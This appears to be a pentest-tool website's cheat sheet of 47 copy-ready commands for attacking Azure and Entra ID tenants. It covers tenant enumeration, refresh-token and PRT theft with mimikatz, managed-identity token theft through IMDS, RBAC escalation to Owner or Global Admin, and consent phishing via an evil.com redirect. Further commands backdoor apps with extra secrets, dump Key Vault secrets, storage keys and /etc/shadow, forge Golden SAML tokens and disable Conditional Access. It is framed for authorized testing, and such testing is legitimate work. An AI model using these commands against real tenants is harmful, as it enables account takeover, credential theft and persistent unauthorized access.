Azure & Entra ID Attacks Cheat Sheet

Azure and Entra ID (Azure AD) attack techniques — access/refresh token theft, managed identity abuse via IMDS, role and privilege escalation, AzureHound collection, illicit OAuth consent grants, and lateral movement from cloud to on-prem. (47 payloads)

Try it interactively with the JWT Decoder & Builder

Recon & Tenant Enumeration

(7)

curl -s 'https://login.microsoftonline.com/[email protected]&xml=1'

Unauthenticated: is the domain Managed (cloud) or Federated (on-prem ADFS)? NameSpaceType reveals itNo auth required

curl -s 'https://login.microsoftonline.com/target.com/.well-known/openid-configuration'

OIDC metadata — leaks the tenant ID (GUID) in token/authorization endpoints

curl -s 'https://login.microsoftonline.com/[email protected]' | jq

Tenant brand name, federation status, and auth URL for the domain

Invoke-AADIntReconAsOutsider -DomainName target.com | Format-Table
# AADInternals: lists all verified domains, tenant ID, MX/SPF, DesktopSSO

AADInternals outsider recon — full unauthenticated tenant footprint

o365creeper.py -f emails.txt -o valid.txt
# Validates which emails exist in the tenant (user enumeration)

Email/user enumeration against login.microsoftonline.com

az account show
az account tenant list
az ad signed-in-user show

Authenticated: confirm current tenant, subscription, and identity

az ad user list --query '[].{u:userPrincipalName,id:id}' -o table
az ad group list -o table
az role assignment list --all -o table

Enumerate users, groups, and every RBAC role assignment in scope

Token Theft & Refresh Token Abuse

(7)

ls ~/.azure/  # accessTokens.json (legacy), msal_token_cache.bin
dir %USERPROFILE%\.azure\msal_token_cache.bin

Azure CLI token cache on disk — exfiltrate for offline reuse from anywhere

# Windows: dump Primary Refresh Token (PRT) cookie
mimikatz # sekurlsa::cloudap
ROADtoken.exe   # produces x-ms-RefreshTokenCredential cookie

Steal the PRT-derived cookie from a domain-joined host — SSO into any Entra appRequires local admin / SYSTEM

# Trade a refresh token for an access token for a new resource:
curl -s -X POST 'https://login.microsoftonline.com/<tenant>/oauth2/v2.0/token' \
  -d 'grant_type=refresh_token' \
  -d 'client_id=1b730954-1685-4b74-9bfd-dac224a7b894' \
  -d 'refresh_token=<RT>' \
  -d 'scope=https://graph.microsoft.com/.default offline_access'

FOCI family refresh tokens are interchangeable across first-party clients — pivot to Graph, ARM, Key Vault

roadtx gettokens -u [email protected] -p 'Password!' -r msgraph
roadtx gettokens --refresh-token <RT> -r azurerm  # swap resource

ROADtools (roadtx): acquire and refresh tokens for any Azure resource

# Decode a stolen JWT to read scp/roles/aud claims:
# aud = audience (target API), scp = delegated scopes, roles = app perms
# Check 'amr' for MFA (pwd, mfa) and 'tid' for tenant

Inspect a captured access token's claims to know exactly what it unlocksUse the JWT decoder tool

Connect-MgGraph -AccessToken (ConvertTo-SecureString '<JWT>' -AsPlainText -Force)
Get-MgContext  # confirm scopes

Replay a stolen Graph access token with the Microsoft Graph PowerShell SDK

az login --service-principal -u <appId> -p <secret_or_cert> --tenant <tid>
az login --identity   # if on a VM with a managed identity

Authenticate as a service principal whose secret/cert you recovered

Managed Identity (IMDS) Abuse

(7)

curl -s -H 'Metadata: true' \
  'http://169.254.169.254/metadata/instance?api-version=2021-02-01' | jq

Confirm you're on an Azure VM — full instance metadata (subscription, RG, name)From SSRF or RCE on a VM

curl -s -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'

Managed Identity token for ARM — control any resource the identity can reach

curl -s -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net'

Managed Identity token for Key Vault — then read every secret/key/cert

curl -s -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com'

Managed Identity token for Microsoft Graph — read directory if app roles allow

# User-assigned identity: specify which one
curl -s -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/&client_id=<UAMI_clientId>'

Pick a specific user-assigned managed identity when several are attached

# App Service / Functions use a different endpoint + header secret:
curl -s -H "X-IDENTITY-HEADER: $IDENTITY_HEADER" \
  "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01"

App Service / Azure Functions MSI — uses IDENTITY_ENDPOINT + secret header, ideal for SSRF

TOKEN=$(curl -s -H 'Metadata: true' 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' | jq -r .access_token)
curl -s -H "Authorization: Bearer $TOKEN" \
  'https://management.azure.com/subscriptions?api-version=2020-01-01'

Use the stolen MSI token against ARM to enumerate subscriptions and resources

Role / RBAC & Privilege Escalation

(7)

az role assignment list --assignee <objectId> --all -o table
az role definition list --query "[?roleName=='Owner']"

What can this principal do? Owner/Contributor/User Access Administrator are the prizes

# User Access Administrator → grant yourself Owner:
az role assignment create --assignee <yourId> \
  --role Owner --scope /subscriptions/<subId>

UAA can assign any role at its scope — escalate to Owner over the whole subscriptionClassic Azure RBAC escalation

# Contributor can't assign roles but CAN run code as resource MIs:
az vm run-command invoke -g <rg> -n <vm> \
  --command-id RunShellScript --scripts 'curl ...IMDS...'

Contributor → execute on a VM and steal a more-privileged managed identity token

# Automation Account / Runbook abuse:
az automation runbook list -g <rg> --automation-account-name <aa>
# Edit/publish a runbook to run as the AA's Run As / managed identity

Automation Accounts run with their own identity — hijack a runbook for code exec

# Entra (directory) role escalation via abusable app permission:
# RoleManagement.ReadWrite.Directory → assign Global Admin
# AppRoleAssignment.ReadWrite.All → grant yourself any Graph app role

Dangerous Graph app permissions that lead straight to Global Admin

# Add yourself to a Privileged Role-eligible group / activate PIM:
az rest --method POST \
  --url 'https://graph.microsoft.com/v1.0/groups/<gid>/members/$ref' \
  --body '{"@odata.id":"https://graph.microsoft.com/v1.0/directoryObjects/<yourId>"}'

Owner of a role-assignable group? Add yourself, inherit its directory role

# Reset another user's password via Graph (needs UserAdmin/Helpdesk):
az rest --method POST \
  --url 'https://graph.microsoft.com/v1.0/users/<id>/authentication/methods/<mid>/resetPassword' \
  --body '{"newPassword":"Sup3r!Pass"}'

Account takeover by password reset when you hold a password-admin role

AzureHound & BloodHound Collection

(6)

azurehound -u [email protected] -p 'Password!' \
  list --tenant <tid> -o output.json

AzureHound: collect tenant graph (users, groups, apps, roles, VMs) with creds

azurehound -r <refresh_token> list --tenant <tid> -o output.json
azurehound -j <jwt_access_token> list --tenant <tid> -o output.json

AzureHound with a stolen refresh token or access token — no password needed

azurehound list az-rm --tenant <tid> -r <RT>
azurehound list az-ad --tenant <tid> -r <RT>

Scope collection to Azure Resource Manager only, or Entra (AAD) only

# Import output.json into BloodHound, then query attack paths:
MATCH p=shortestPath((u:AZUser)-[r*1..]->(t:AZTenant)) RETURN p

Cypher: shortest path from a controlled user to tenant-level control

MATCH (u {name:'[email protected]'})-[r:AZAddMembers|AZOwns|AZUserAccessAdministrator*1..]->(g) RETURN g

Find escalation edges (AZAddMembers, AZOwns, AZUserAccessAdministrator) from your principal

MATCH p=(n)-[:AZGlobalAdmin|AZPrivilegedRoleAdmin]->(:AZTenant) RETURN p

Who holds Global Admin / Privileged Role Admin — the crown-jewel targets

Illicit Consent & App Registration Abuse

(6)

https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=<EVIL_APP>&response_type=code&redirect_uri=https://evil.com/cb&scope=offline_access%20Mail.Read%20Files.Read.All%20User.Read

Illicit consent grant: phish a victim to approve your app — get a long-lived refresh token to their mailbox/filesConsent phishing

# Multi-tenant app that requests delegated scopes; if admin consents,
# the grant covers the whole tenant ('Consent on behalf of your organization')

Target an admin so a single click grants tenant-wide delegated access

az ad app create --display-name 'Helpdesk Sync' \
  --required-resource-accesses @perms.json
az ad sp create --id <appId>

# Add a hidden credential to an existing (trusted) app for persistence:
az ad app credential reset --id <appId> --append
az ad sp credential reset --id <spId> --append

Backdoor a legitimate app/SP with an extra client secret — survives password resets

# Hunt existing risky grants in the tenant:
Get-MgOauth2PermissionGrant -All | ? { $_.Scope -match 'Mail|Files|Directory' }
Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId <id>

Enumerate OAuth2 permission grants and app role assignments to find abusable apps

# Federated credential / workload identity backdoor (no secret on disk):
az ad app federated-credential create --id <appId> \
  --parameters '{"name":"gh","issuer":"https://token.actions.githubusercontent.com","subject":"repo:org/repo:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}'

Add a federated credential so an external OIDC issuer (e.g. GitHub Actions) can mint tokens as the app

Post-Exploitation & Lateral Movement

(7)

TOKEN=$(az account get-access-token --resource https://vault.azure.net --query accessToken -o tsv)
curl -s -H "Authorization: Bearer $TOKEN" 'https://<vault>.vault.azure.net/secrets?api-version=7.4' | jq

List and read every Key Vault secret your token can reach — DB creds, API keys, certs

az storage account keys list -n <acct> -g <rg>
az storage blob list --account-name <acct> -c <container> --account-key <key>

Dump storage account keys, then read/exfiltrate blob containers

az vm run-command invoke -g <rg> -n <vm> \
  --command-id RunShellScript --scripts 'id; cat /etc/shadow'
az vm run-command invoke -g <rg> -n <vm> \
  --command-id RunPowerShellScript --scripts 'whoami /all'

Run arbitrary commands on VMs as SYSTEM/root via the RunCommand extension

# Cloud → on-prem: dump Entra Connect sync account creds
mimikatz # adsync
AADInternals: Get-AADIntSyncCredentials  # MSOL_ account = DCSync rights

Compromise the Entra Connect server to recover the MSOL_ sync account (effective DCSync on-prem)Cloud-to-ground pivot

# Forge a SAML token to impersonate any user (Golden SAML):
New-AADIntSAMLToken -ImmutableID <id> -PfxFileName ADFS_signing.pfx -Issuer 'http://sts.target.com/adfs/services/trust'

Golden SAML: steal the ADFS/federation signing cert, mint tokens for any federated user

# Persistence: register a rogue device or add a TAP
Get-MgUserAuthenticationTemporaryAccessPassMethod -UserId <id>
New-MgUserAuthenticationTemporaryAccessPassMethod -UserId <id> -BodyParameter @{ lifetimeInMinutes=480 }

Plant a Temporary Access Pass as a stealthy, MFA-satisfying backdoor credential

# Disable / weaken Conditional Access (needs Global/Security Admin):
Update-MgIdentityConditionalAccessPolicy -ConditionalAccessPolicyId <id> -State disabled

Turn off a Conditional Access policy to drop MFA/location enforcement for follow-on access

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Post-Exploitation Cheat Sheet Cloud Attacks Cheat Sheet Active Directory & Kerberos Cheat Sheet OAuth & OIDC Security Cheat Sheet

Frequently asked questions

What is the Azure & Entra ID Attacks Cheat Sheet?+

It's a quick-reference collection of 47 Azure Attacks payloads for testing Azure & Entra ID Attacks vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Azure Attacks payloads?+

Copy any payload straight into your authorized test, or use the JWT Decoder & Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these Azure Attacks payloads free to use?+

Yes — this cheat sheet and all Azure Attacks payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Azure & Entra ID Attacks Cheat Sheet?+

How do I use these Azure Attacks payloads?+

Copy any payload straight into your authorized test, or use the JWT Decoder & Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these Azure Attacks payloads free to use?+

Yes — this cheat sheet and all Azure Attacks payloads are completely free, with no account required. Everything runs in your browser.

Azure & Entra ID Attacks Cheat Sheet

Recon & Tenant Enumeration

Token Theft & Refresh Token Abuse

Managed Identity (IMDS) Abuse

Role / RBAC & Privilege Escalation

AzureHound & BloodHound Collection

Illicit Consent & App Registration Abuse

Post-Exploitation & Lateral Movement

Related Tools

Related Cheat Sheets

Frequently asked questions

Azure & Entra ID Attacks Cheat Sheet

Recon & Tenant Enumeration

Token Theft & Refresh Token Abuse

Managed Identity (IMDS) Abuse

Role / RBAC & Privilege Escalation

AzureHound & BloodHound Collection

Illicit Consent & App Registration Abuse

Post-Exploitation & Lateral Movement

Related Tools

Related Cheat Sheets

Frequently asked questions